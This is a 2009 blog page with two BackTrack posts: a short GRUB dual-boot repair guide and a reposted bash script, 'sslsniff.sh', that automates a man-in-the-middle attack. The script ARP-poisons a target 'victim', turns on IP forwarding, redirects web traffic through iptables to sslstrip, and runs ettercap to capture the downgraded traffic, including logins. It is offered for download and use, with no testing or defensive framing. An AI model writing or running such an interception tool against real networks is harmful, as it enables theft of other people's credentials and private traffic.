Longjidin's Kg Lengkong to Bukit Lada

Repair bootloader dualboot BackTrack 4 with Windows xxx

Posted in BackTrack by longjidin on November 19, 2009

Follow this simple step.

Before we continue with this step, we must mount all hard drive first then we can proceed. Remember that MOUNT all Hard Drive first!!!...

———————————————————————————————————————–

- OK open shell as a root then type:-

# cd /boot/grub ENTER

- then type :-

# grub ENTER

- then type:-

#find /boot/grub/stage1 ENTER

- this command will find the computer HD directory example:  hd0,1 or hd0,2 or hd0,3 etc.

- for example my HD is (hd0,2)

- then type :-

# root (hd0,2) ENTER
# setup (hd0) ENTER

- Ok done then type:-

# quit ENTER

- reboot our machine now and we look at bootloader it is working or not.

- Now BackTrak grub will be appear normally just like old day.

Tagged with:

leave a comment

sslsniff.sh script

Posted in BackTrack by longjidin on November 15, 2009

This is a script for SSL sniffing.
ToDO:
- ensure ip_forward is always set

General Usage:
./sslsniff.sh -v <ip of target> -g <ip of gateway>
-v and -g are the only required flags, the rest are optional.
if -s is not specified sslstrip defaults to port 10000
-h for help

Download: mediafire.com/?nmtz2tjvuyj
Code:

Code:
#!/bin/bash
#
# Synopsis:	A program to sniff traffic in an SSL connection
# Author:		thims (thims DOT local AT gmail DOT com)
# Version:	0.3
# Date:			20091107
# Comments:
#		ToDO:

# leave blank simply here for coding style
victim=
gateway=
sslPort=10000
etterConf=/etc/etter.conf

# print help
function help() {
cat << EOF
Usage: $0 [args] host
    -h, --help     -  Print this help and exit
    -i. --iface    -  Interface to use
    -e, --etconf   -  Location of etter.conf on the filesystem
    -v, --victim   -  IP address of desired host
    -g, --gateway  -  IP address of network gateway
    -s, --sslport  -  Desired port for sslstrip
EOF
}

# echo supplied argument and die
function die() {
	if [ -n "$1" ] ;then
		echo "$1"
	fi
	exit 1
}

# nohup wrapper to check if specified program will execute correctly
function noHup() {
	cmd="$1"
	nohup $cmd > /dev/null &> /dev/null &
	sleep 5
	# here simply to handle sslstrip because it is ran by python it throws off pidof
	if [ $(echo "$cmd" | awk -F" " '{print $1}') == "sslstrip" ] ;then
		pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')
	else
		pid=$(pidof $(echo "$1" | awk -F" " '{print $1}'))
	fi

	if [ -z "$pid" ] ;then
		return 1
	else
		return 0
	fi
}

# poison the arp
function spoofMac() {
	echo -n "Poisoning the victim...."
	noHup "arpspoof "$iface" -t "$victim" "$gateway""
	if [ $? -gt 0 ] ;then
		die "Error: could not initiate arpspoof. Dieing..."
	fi
	echo $(pidof arpspoof) > /var/run/sslsniff.arpspoof.run
	echo "Ok"
}

# intercept the SSL cert
function sslInit() {
	echo -n "Setting up SSL intercept...."
	echo 1 > /proc/sys/net/ipv4/ip_forward
	# ensure that ip_forward is set
	while [ $(cat /proc/sys/net/ipv4/ip_forward) == 0 ]
	do
		echo 1 > /proc/sys/net/ipv4/ip_forward
	done

	iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
	noHup "sslstrip -a -f -k -l "$sslPort""
	if [ $? -gt 0 ] ;then
		die "Error: could not initiate sslstrip. Dieing..."
	fi
	echo $(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') > /var/run/sslsniff.sslstrip.run
	echo "Ok"
}

# capture the responses
function capture() {
	# edit ettercap.conf
	for linNum in $(cat "$etterConf" | grep -in redir | grep iptables | awk -F: '{print $1}')
	do
		sed -i $linNum's/#//' "$etterConf"
	done

	echo -n "Starting to sniff...."
	ettercap -T -q "$iface"
}

# clean up enviroment
function cleanUp() {
	echo "Cleaning up...."
	echo -n "Closing SSL proxy...."
	kill $(cat /var/run/sslsniff.sslstrip.run)
	rm /var/run/sslsniff.sslstrip.run
	echo "Ok"
	echo -n "Unpoisoning the victim...."
	kill  -n 2 $(cat /var/run/sslsniff.arpspoof.run)
	rm /var/run/sslsniff.arpspoof.run
	echo "Ok"
	echo -n "Removing iptables rule and ip_forwarding...."
	iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
	echo 0 > /proc/sys/net/ipv4/ip_forward
	echo "Ok"

	# return etter.conf to the state it was found in
	echo -n "Returning etter.conf to the configuration we found it with...."
	for linNum in $(cat "$etterConf" | grep -in redir | grep iptables | awk -F: '{print $1}')
	do
		sed -i $linNum's/^/#/' "$etterConf"
	done
	echo "Ok"
	echo "Have a nice day!"
}

# initialize the whole shebang
function initialize() {
  if [ -z "$victim" ] || [ -z "$gateway" ] ;then
    help
    echo
    die "Error: a syntactical one"
	else
		echo "Enviroment details:"
		echo "    Victim:         " "$victim" "  Ok!"
		echo "    Gateway/Router: " "$gateway" "  OK!"
		echo "    Interface:      " "$iface" "  OK!"
		echo "    SSLStrip port:  "	"$sslPort" "  OK!"

    spoofMac
    sslInit
    capture
		cleanUp
  fi
}

# some CLI ARGS?
while [ $# -gt 0 ]
do
	case "$1" in
		"-h"|"--help")
			help
			die
		;;
		"-v"|"--victim")
			victim="$2"
		;;
		"-g"|"--gw")
			gateway="$2"
		;;
		"-s"|"--sslport")
			sslPort="$2"
		;;
		"-i"|"--iface")
			if [ $(ifconfig "$2" &> /dev/null; echo $?) == 1 ] ;then
				die "Error: interface "$2" does not exist!"
			else
				iface="-i $2"
			fi
		;;
		"-e"|"--etconf")
			if [ ! -e "$2" ] ;then
				die "Error: specified ettercap conf does not exist!"
			else
				etterConf="$2"
			fi
		;;
		'')
			help
			echo
			die "Error: a syntactical one"
		;;
		-*)
			help
			echo
			die "Error: a syntactical one"
		;;
	esac
	shift
done

# main loop
initialize

thanks to Thims from remote-exploit community

original link :http://forums.remote-exploit.org/programming/28697-sslsniff-sh.html

Tagged with:

leave a comment